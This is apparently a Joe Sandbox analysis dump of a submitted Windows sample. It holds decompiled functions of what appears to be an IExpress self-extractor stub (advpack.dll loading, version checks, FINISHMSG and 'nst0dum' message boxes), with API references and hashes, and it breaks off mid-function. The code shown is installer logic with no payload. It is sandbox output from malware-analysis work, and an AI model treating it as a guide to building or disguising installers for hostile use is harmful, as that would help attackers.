                                                                                                                                                                                                    0x001338f5
                                                                                                                                                                                                    0x001338fb
                                                                                                                                                                                                    0x00133901
                                                                                                                                                                                                    0x00133901
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013390a
                                                                                                                                                                                                    0x0013374b
                                                                                                                                                                                                    0x0013374e
                                                                                                                                                                                                    0x0013375c
                                                                                                                                                                                                    0x00133764
                                                                                                                                                                                                    0x00133769
                                                                                                                                                                                                    0x0013376e
                                                                                                                                                                                                    0x00133771
                                                                                                                                                                                                    0x0013379c
                                                                                                                                                                                                    0x0013379f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001337a3
                                                                                                                                                                                                    0x001337a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001337a4
                                                                                                                                                                                                    0x00133773
                                                                                                                                                                                                    0x00133777
                                                                                                                                                                                                    0x00133778
                                                                                                                                                                                                    0x0013377f
                                                                                                                                                                                                    0x00133781
                                                                                                                                                                                                    0x0013378e
                                                                                                                                                                                                    0x0013378e
                                                                                                                                                                                                    0x00133794
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133794
                                                                                                                                                                                                    0x00133783
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133785
                                                                                                                                                                                                    0x0013378c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013378c
                                                                                                                                                                                                    0x00133750
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013372d
                                                                                                                                                                                                    0x0013372d
                                                                                                                                                                                                    0x0013396b
                                                                                                                                                                                                    0x0013396b
                                                                                                                                                                                                    0x0013396c
                                                                                                                                                                                                    0x0013396e
                                                                                                                                                                                                    0x0013396f
                                                                                                                                                                                                    0x00133a1e
                                                                                                                                                                                                    0x00133a1e
                                                                                                                                                                                                    0x00133a22
                                                                                                                                                                                                    0x00133a27
                                                                                                                                                                                                    0x00133a3e
                                                                                                                                                                                                    0x00133a3e

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00133723
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 001339C3
                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,nst0dum,00000030), ref: 001339F1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$BeepVersion
                                                                                                                                                                                                    • String ID: 3$nst0dum
                                                                                                                                                                                                    • API String ID: 2519184315-140149190
                                                                                                                                                                                                    • Opcode ID: 129a6aa765b89fd7e186f8c9e86bfb65185a0b6a54239fd07d556c7d46e4f8e4
                                                                                                                                                                                                    • Instruction ID: ed22d9c89406dd5cc49ccb064bca396376a3f06464ffdd0129e4b292961b51a1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 129a6aa765b89fd7e186f8c9e86bfb65185a0b6a54239fd07d556c7d46e4f8e4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9491E271E012249FEB398F14CC81BAAB7B0AF45304F1541A9E9A9EB251DB708F81DB45
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                    			E00136495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed char _t14;
                                                                                                                                                                                                    				struct HINSTANCE__* _t15;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				CHAR* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t27 = __esi;
                                                                                                                                                                                                    				_t18 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				E00131781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                    				_t26 = "advpack.dll";
                                                                                                                                                                                                    				E0013658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                    				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                    					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x00136495
                                                                                                                                                                                                    0x00136495
                                                                                                                                                                                                    0x001364a0
                                                                                                                                                                                                    0x001364a7
                                                                                                                                                                                                    0x001364ab
                                                                                                                                                                                                    0x001364bd
                                                                                                                                                                                                    0x001364c2
                                                                                                                                                                                                    0x001364d3
                                                                                                                                                                                                    0x001364df
                                                                                                                                                                                                    0x001364e8
                                                                                                                                                                                                    0x00136502
                                                                                                                                                                                                    0x001364ee
                                                                                                                                                                                                    0x001364f9
                                                                                                                                                                                                    0x001364f9
                                                                                                                                                                                                    0x00136516

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001364DF
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001364F9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00136502
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                    • API String ID: 438848745-179718922
                                                                                                                                                                                                    • Opcode ID: 15c129d862528f9a5debb6e9b187f675461d5fea5d6e598d292d4196daaa85ef
                                                                                                                                                                                                    • Instruction ID: 0c8fdc9ef4581ad649a94f251ba2354082681b27f8f433e62ce281c636b7a666
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15c129d862528f9a5debb6e9b187f675461d5fea5d6e598d292d4196daaa85ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A01A470A04108BBDB54EB64DC49EEE7B78EF64311F9041A5F5C9A21D0DFB09ECACA51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001328E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                    				long _t68;
                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v12 = __edx;
                                                                                                                                                                                                    				_t99 = __ecx;
                                                                                                                                                                                                    				_t106 = 0;
                                                                                                                                                                                                    				_v16 = __ecx;
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				_t103 = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    					_t106 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t62 = 0;
                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                    						if(E00132773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                    						_v28 = _t68;
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_t99 = _v16;
                                                                                                                                                                                                    							_t70 = _v8 + _t99;
                                                                                                                                                                                                    							_t93 = _v24;
                                                                                                                                                                                                    							_t87 = _v20;
                                                                                                                                                                                                    							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                    							if(_t103 != 0) {
                                                                                                                                                                                                    								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                    								_v36 = _t73;
                                                                                                                                                                                                    								if(_t73 != 0) {
                                                                                                                                                                                                    									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                    										L15:
                                                                                                                                                                                                    										GlobalUnlock(_t103);
                                                                                                                                                                                                    										_t99 = _v16;
                                                                                                                                                                                                    										L18:
                                                                                                                                                                                                    										_t87 = _t87 + 1;
                                                                                                                                                                                                    										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                    										_v20 = _t87;
                                                                                                                                                                                                    										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                    										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L19;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t79 = _v44;
                                                                                                                                                                                                    										_t88 = _t106;
                                                                                                                                                                                                    										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                    										_t101 = _v28;
                                                                                                                                                                                                    										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                    										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                    										_t97 = _v48;
                                                                                                                                                                                                    										_v36 = _t83;
                                                                                                                                                                                                    										_t109 = _t83;
                                                                                                                                                                                                    										do {
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00132A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00132A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                    											_t109 = _t109 + 0x18;
                                                                                                                                                                                                    											_t88 = _t88 + 4;
                                                                                                                                                                                                    										} while (_t88 < 8);
                                                                                                                                                                                                    										_t87 = _v20;
                                                                                                                                                                                                    										_t106 = 0;
                                                                                                                                                                                                    										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                    											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                    												GlobalUnlock(_t103);
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												goto L15;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L15;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L20:
                                                                                                                                                                                                    				 *_a8 = _t87;
                                                                                                                                                                                                    				if(_t103 != 0) {
                                                                                                                                                                                                    					GlobalFree(_t103);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t106;
                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x001328f1
                                                                                                                                                                                                    0x001328f4
                                                                                                                                                                                                    0x001328f7
                                                                                                                                                                                                    0x001328f9
                                                                                                                                                                                                    0x001328fc
                                                                                                                                                                                                    0x001328ff
                                                                                                                                                                                                    0x00132901
                                                                                                                                                                                                    0x00132907
                                                                                                                                                                                                    0x00132a62
                                                                                                                                                                                                    0x00132a64
                                                                                                                                                                                                    0x0013290d
                                                                                                                                                                                                    0x0013290d
                                                                                                                                                                                                    0x0013290f
                                                                                                                                                                                                    0x00132912
                                                                                                                                                                                                    0x00132920
                                                                                                                                                                                                    0x00132937
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132944
                                                                                                                                                                                                    0x0013294a
                                                                                                                                                                                                    0x0013294f
                                                                                                                                                                                                    0x00132a2f
                                                                                                                                                                                                    0x00132a32
                                                                                                                                                                                                    0x00132a34
                                                                                                                                                                                                    0x00132a37
                                                                                                                                                                                                    0x00132a41
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132955
                                                                                                                                                                                                    0x0013295e
                                                                                                                                                                                                    0x00132962
                                                                                                                                                                                                    0x00132969
                                                                                                                                                                                                    0x0013296f
                                                                                                                                                                                                    0x00132974
                                                                                                                                                                                                    0x0013298c
                                                                                                                                                                                                    0x00132a20
                                                                                                                                                                                                    0x00132a21
                                                                                                                                                                                                    0x00132a27
                                                                                                                                                                                                    0x00132a4c
                                                                                                                                                                                                    0x00132a4f
                                                                                                                                                                                                    0x00132a50
                                                                                                                                                                                                    0x00132a53
                                                                                                                                                                                                    0x00132a56
                                                                                                                                                                                                    0x00132a5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001329b2
                                                                                                                                                                                                    0x001329b2
                                                                                                                                                                                                    0x001329b5
                                                                                                                                                                                                    0x001329bd
                                                                                                                                                                                                    0x001329c3
                                                                                                                                                                                                    0x001329cc
                                                                                                                                                                                                    0x001329d5
                                                                                                                                                                                                    0x001329d7
                                                                                                                                                                                                    0x001329da
                                                                                                                                                                                                    0x001329dd
                                                                                                                                                                                                    0x001329df
                                                                                                                                                                                                    0x001329ec
                                                                                                                                                                                                    0x001329f8
                                                                                                                                                                                                    0x001329fc
                                                                                                                                                                                                    0x001329ff
                                                                                                                                                                                                    0x00132a02
                                                                                                                                                                                                    0x00132a07
                                                                                                                                                                                                    0x00132a0a
                                                                                                                                                                                                    0x00132a0f
                                                                                                                                                                                                    0x00132a19
                                                                                                                                                                                                    0x00132a81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132a0f
                                                                                                                                                                                                    0x0013298c
                                                                                                                                                                                                    0x00132974
                                                                                                                                                                                                    0x00132962
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013294f
                                                                                                                                                                                                    0x00132912
                                                                                                                                                                                                    0x00132a65
                                                                                                                                                                                                    0x00132a68
                                                                                                                                                                                                    0x00132a6c
                                                                                                                                                                                                    0x00132a6f
                                                                                                                                                                                                    0x00132a6f
                                                                                                                                                                                                    0x00132a7d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00132A6F
                                                                                                                                                                                                      • Part of subcall function 00132773: CharUpperA.USER32(E764604F,00000000,00000000,00000000), ref: 001327A8
                                                                                                                                                                                                      • Part of subcall function 00132773: CharNextA.USER32(0000054D), ref: 001327B5
                                                                                                                                                                                                      • Part of subcall function 00132773: CharNextA.USER32(00000000), ref: 001327BC
                                                                                                                                                                                                      • Part of subcall function 00132773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132829
                                                                                                                                                                                                      • Part of subcall function 00132773: RegQueryValueExA.ADVAPI32(?,00131140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132852
                                                                                                                                                                                                      • Part of subcall function 00132773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132870
                                                                                                                                                                                                      • Part of subcall function 00132773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001328A0
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00133938,?,?,?,?,-00000005), ref: 00132958
                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00132969
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00133938,?,?,?,?,-00000005,?), ref: 00132A21
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00132A81
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3949799724-0
                                                                                                                                                                                                    • Opcode ID: d6479b7c2bd029a1ec2679ab5d7e9cbd1aaaf473decbe9297c33d8d1f43cffed
                                                                                                                                                                                                    • Instruction ID: 685a4a7e3b6f7ddc4aabc0909b9ca8e9fa548c277f35c81aae16b331a33aa091
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6479b7c2bd029a1ec2679ab5d7e9cbd1aaaf473decbe9297c33d8d1f43cffed
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25513A31E00219EFCB25EF98C884AAEFBB9FF48710F14412AE945E3611DB319D41DB90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                    			E00134169(void* __eflags) {
                                                                                                                                                                                                    				int _t18;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = E0013468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                    				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                    					if(E0013468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							return LocalFree(_t21);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(0x40);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t21);
                                                                                                                                                                                                    						_t18 = 0x3e9;
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						E001344B9(0, _t18);
                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_t18 = 0x4b1;
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E001344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x0013417d
                                                                                                                                                                                                    0x0013418f
                                                                                                                                                                                                    0x00134193
                                                                                                                                                                                                    0x001341b7
                                                                                                                                                                                                    0x001341d3
                                                                                                                                                                                                    0x001341e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001341e7
                                                                                                                                                                                                    0x001341d5
                                                                                                                                                                                                    0x001341d6
                                                                                                                                                                                                    0x001341d8
                                                                                                                                                                                                    0x001341d9
                                                                                                                                                                                                    0x001341da
                                                                                                                                                                                                    0x001341df
                                                                                                                                                                                                    0x001341e1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001341e1
                                                                                                                                                                                                    0x001341b9
                                                                                                                                                                                                    0x001341ba
                                                                                                                                                                                                    0x001341bc
                                                                                                                                                                                                    0x001341bd
                                                                                                                                                                                                    0x001341be
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001341be
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001330B4), ref: 00134189
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001330B4), ref: 001341E7
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                    • Opcode ID: be710e66c7bfc4f189c089e47d6cea68e8867ba6a23c9ef556dea8fef9647dd5
                                                                                                                                                                                                    • Instruction ID: 79c9ee75ef8790ccad868978c7b0d96913d399668139865302f5246b437d0398
                                                                                                                                                                                                    • Opcode Fuzzy Hash: be710e66c7bfc4f189c089e47d6cea68e8867ba6a23c9ef556dea8fef9647dd5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82014FF13006243BF3282A654C86F7B258EEFE0794F000035B746E21808BA8FC8000B9
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00137155() {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct _FILETIME _v16;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                    				_t23 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                    					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                    					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                    					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                    					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                    					_t39 = _t36;
                                                                                                                                                                                                    					if(_t36 == 0xbb40e64e || ( *0x138004 & 0xffff0000) == 0) {
                                                                                                                                                                                                    						_t36 = 0xbb40e64f;
                                                                                                                                                                                                    						_t39 = 0xbb40e64f;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x138004 = _t39;
                                                                                                                                                                                                    				}
